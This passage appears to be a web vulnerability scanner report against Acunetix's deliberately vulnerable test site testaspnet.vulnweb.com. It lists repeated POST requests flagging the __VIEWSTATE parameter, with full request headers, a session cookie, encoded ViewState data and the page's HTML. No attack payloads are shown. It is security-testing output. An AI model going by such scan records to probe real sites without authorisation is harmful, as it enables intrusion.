Request Body - size: 1,101 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8398&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAOiCL69oIHgJTRBYBBgDA%2FKAv6doIZGRkqDYdP%2BykyVAtXfMM1%2FDJIRBASwI%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwL97tCmBAL%2BkLjwCwLRp67yDgKQuo2fAQKQuo2fAQKQuqGyCgKQuqGyCgKQutXWAwKQutXWAwKQusntDAKQusntDAKQur3VCQKQur3VCQKQutHpAgKQutHpAgLX2ZCeBwLX2ZCeBwLX2YQ1AtfZhDUC19m4yAkC19m4yAkC19ms7wIC19ms7wIC19nAgwoC19nAgwoC19n0pgMC19n0pgMC19no%2FQwC19no%2FQwC19mckAQC19mckAQC19nw%2BQIC19nw%2BQIC19nknAoC19nknAoCqOD2hQ0CqOD2hQ0CqODq2AYCqODq2AYCqOCe%2Fw8CqOCe%2Fw8CqOCykgcCqOCykgcCqOCmKQKo4KYpAqjg2s0JAqjg2s0JAqjgzuACAqjgzuACAqjg4ocKAqjg4ocKAqjg1uwIAqjg1uwIAqjgygMCqODKAwKN99SoAwKN99SoAwKN98jPDAKN98jPDAKN9%2FziBQKN9%2FziBQKN95C5DQKN95C5DQKN94TcBgKN94TcBgKN97jzDwKN97jzDwKN96yWBwKN96yWBwKN98AqAo33wCoCjfe0kg0Cjfe0kg0CjfeoqQYCjfeoqQYC5p273gkC5p273gkC5p2v9QIC5p2v9QIC5p3DiQoC5p3DiQoC5p33rAMC5p33rAMC5p3rwwwC5p3rwwwC5p2f5gUC5p2f5gUaDqzWfcb4h5nG8XEuKOsPPT5sEg%3D%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:51:56 GMT Content-Length: 12592
Response Body - size: 12,592 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAOiCL69oIHgJTRBYBBgDA/KAv6doIZGRkqDYdP+ykyVAtXfMM1/DJIRBASwI=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwL97tCmBAL+kLjwCwLRp67yDgKQuo2fAQKQuo2fAQKQuqGyCgKQuqGyCgKQutXWAwKQutXWAwKQusntDAKQusntDAKQur3VCQKQur3VCQKQutHpAgKQutHpAgLX2ZCeBwLX2ZCeBwLX2YQ1AtfZhDUC19m4yAkC19m4yAkC19ms7wIC19ms7wIC19nAgwoC19nAgwoC19n0pgMC19n0pgMC19no/QwC19no/QwC19mckAQC19mckAQC19nw+QIC19nw+QIC19nknAoC19nknAoCqOD2hQ0CqOD2hQ0CqODq2AYCqODq2AYCqOCe/w8CqOCe/w8CqOCykgcCqOCykgcCqOCmKQKo4KYpAqjg2s0JAqjg2s0JAqjgzuACAqjgzuACAqjg4ocKAqjg4ocKAqjg1uwIAqjg1uwIAqjgygMCqODKAwKN99SoAwKN99SoAwKN98jPDAKN98jPDAKN9/ziBQKN9/ziBQKN95C5DQKN95C5DQKN94TcBgKN94TcBgKN97jzDwKN97jzDwKN96yWBwKN96yWBwKN98AqAo33wCoCjfe0kg0Cjfe0kg0CjfeoqQYCjfeoqQYC5p273gkC5p273gkC5p2v9QIC5p2v9QIC5p3DiQoC5p3DiQoC5p33rAMC5p33rAMC5p3rwwwC5p3rwwwC5p2f5gUC5p2f5gUaDqzWfcb4h5nG8XEuKOsPPT5sEg==" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8370')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">January 2023</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8432')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:White" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8408')" style="color:Black" title="January 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8409')" style="color:Black" title="January 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8410')" style="color:Black" title="January 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8411')" style="color:Black" title="January 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8412')" style="color:Black" title="January 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8413')" style="color:Black" title="January 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8414')" style="color:Black" title="January 14">14</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8415')" style="color:Black" title="January 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8416')" style="color:Black" title="January 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8417')" style="color:Black" title="January 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8418')" style="color:Black" title="January 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8419')" style="color:Black" title="January 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8420')" style="color:Black" title="January 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8421')" style="color:Black" title="January 21">21</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8422')" style="color:Black" title="January 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8423')" style="color:Black" title="January 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8424')" style="color:Black" title="January 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8425')" style="color:Black" title="January 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8426')" style="color:Black" title="January 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8427')" style="color:Black" title="January 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8428')" style="color:Black" title="January 28">28</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8429')" style="color:Black" title="January 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8430')" style="color:Black" title="January 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8431')" style="color:Black" title="January 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8432')" style="color:Black" title="February 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8433')" style="color:Black" title="February 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8434')" style="color:Black" title="February 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8435')" style="color:Black" title="February 04">4</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__VIEWSTATE
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1097 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,097 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8410&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAOiCL69oIHgJTRBYBBgDA8Z2d8toIZGRkSueUav%2F5rnqwPH5lW4n2t3hYwDM%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwK58azxBQL%2BkLjwCwLRp67yDgKQuo2fAQKQuo2fAQKQuqGyCgKQuqGyCgKQutXWAwKQutXWAwKQusntDAKQusntDAKQur3VCQKQur3VCQKQutHpAgKQutHpAgLX2ZCeBwLX2ZCeBwLX2YQ1AtfZhDUC19m4yAkC19m4yAkC19ms7wIC19ms7wIC19nAgwoC19nAgwoC19n0pgMC19n0pgMC19no%2FQwC19no%2FQwC19mckAQC19mckAQC19nw%2BQIC19nw%2BQIC19nknAoC19nknAoCqOD2hQ0CqOD2hQ0CqODq2AYCqODq2AYCqOCe%2Fw8CqOCe%2Fw8CqOCykgcCqOCykgcCqOCmKQKo4KYpAqjg2s0JAqjg2s0JAqjgzuACAqjgzuACAqjg4ocKAqjg4ocKAqjg1uwIAqjg1uwIAqjgygMCqODKAwKN99SoAwKN99SoAwKN98jPDAKN98jPDAKN9%2FziBQKN9%2FziBQKN95C5DQKN95C5DQKN94TcBgKN94TcBgKN97jzDwKN97jzDwKN96yWBwKN96yWBwKN98AqAo33wCoCjfe0kg0Cjfe0kg0CjfeoqQYCjfeoqQYC5p273gkC5p273gkC5p2v9QIC5p2v9QIC5p3DiQoC5p3DiQoC5p33rAMC5p33rAMC5p3rwwwC5p3rwwwC5p2f5gUC5p2f5gUzrA3cb9xZKioSCq9kMQOKTG1ESQ%3D%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:24:49 GMT Content-Length: 12592
Response Body - size: 12,592 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAOiCL69oIHgJTRBYBBgDA8Z2d8toIZGRkSueUav/5rnqwPH5lW4n2t3hYwDM=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwK58azxBQL+kLjwCwLRp67yDgKQuo2fAQKQuo2fAQKQuqGyCgKQuqGyCgKQutXWAwKQutXWAwKQusntDAKQusntDAKQur3VCQKQur3VCQKQutHpAgKQutHpAgLX2ZCeBwLX2ZCeBwLX2YQ1AtfZhDUC19m4yAkC19m4yAkC19ms7wIC19ms7wIC19nAgwoC19nAgwoC19n0pgMC19n0pgMC19no/QwC19no/QwC19mckAQC19mckAQC19nw+QIC19nw+QIC19nknAoC19nknAoCqOD2hQ0CqOD2hQ0CqODq2AYCqODq2AYCqOCe/w8CqOCe/w8CqOCykgcCqOCykgcCqOCmKQKo4KYpAqjg2s0JAqjg2s0JAqjgzuACAqjgzuACAqjg4ocKAqjg4ocKAqjg1uwIAqjg1uwIAqjgygMCqODKAwKN99SoAwKN99SoAwKN98jPDAKN98jPDAKN9/ziBQKN9/ziBQKN95C5DQKN95C5DQKN94TcBgKN94TcBgKN97jzDwKN97jzDwKN96yWBwKN96yWBwKN98AqAo33wCoCjfe0kg0Cjfe0kg0CjfeoqQYCjfeoqQYC5p273gkC5p273gkC5p2v9QIC5p2v9QIC5p3DiQoC5p3DiQoC5p33rAMC5p33rAMC5p3rwwwC5p3rwwwC5p2f5gUC5p2f5gUzrA3cb9xZKioSCq9kMQOKTG1ESQ==" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8370')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">January 2023</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8432')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8408')" style="color:Black" title="January 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8409')" style="color:Black" title="January 09">9</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8410')" style="color:White" title="January 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8411')" style="color:Black" title="January 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8412')" style="color:Black" title="January 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8413')" style="color:Black" title="January 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8414')" style="color:Black" title="January 14">14</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8415')" style="color:Black" title="January 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8416')" style="color:Black" title="January 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8417')" style="color:Black" title="January 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8418')" style="color:Black" title="January 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8419')" style="color:Black" title="January 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8420')" style="color:Black" title="January 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8421')" style="color:Black" title="January 21">21</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8422')" style="color:Black" title="January 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8423')" style="color:Black" title="January 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8424')" style="color:Black" title="January 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8425')" style="color:Black" title="January 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8426')" style="color:Black" title="January 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8427')" style="color:Black" title="January 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8428')" style="color:Black" title="January 28">28</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8429')" style="color:Black" title="January 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8430')" style="color:Black" title="January 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8431')" style="color:Black" title="January 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8432')" style="color:Black" title="February 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8433')" style="color:Black" title="February 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8434')" style="color:Black" title="February 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8435')" style="color:Black" title="February 04">4</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__VIEWSTATE
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1099 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
